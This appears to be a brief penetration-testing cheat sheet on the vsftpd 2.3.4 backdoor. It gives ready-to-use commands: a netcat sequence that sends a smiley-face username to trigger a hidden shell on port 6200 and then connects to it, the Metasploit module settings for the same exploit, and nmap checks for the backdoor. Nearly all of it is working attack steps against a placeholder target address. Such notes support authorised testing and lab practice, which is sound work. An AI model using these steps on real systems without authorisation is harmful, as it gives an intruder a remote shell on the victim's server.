vsftpd

What it is: "Very Secure FTP Daemon" — lightweight FTP server for Linux. Version 2.3.4 was infamously backdoored with a hardcoded shell triggered by a smiley face in the username.

Default ports: 21 (FTP), 6200 (backdoor shell)

Vuln research:


vsftpd 2.3.4 Backdoor

Smiley face backdoor — Triggered by username containing :)

nc $IP 21
USER backdoor:)
PASS anything
# Opens shell on port 6200
nc $IP 6200

Metasploit vsftpd backdoor

Automated exploitation — Fastest method

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS $IP
run

Check if backdoor is present

Not all 2.3.4 installations have the backdoor — Verify first

nmap -sV -p 21 $IP
# If version shows 2.3.4, try the backdoor
nmap -p 6200 $IP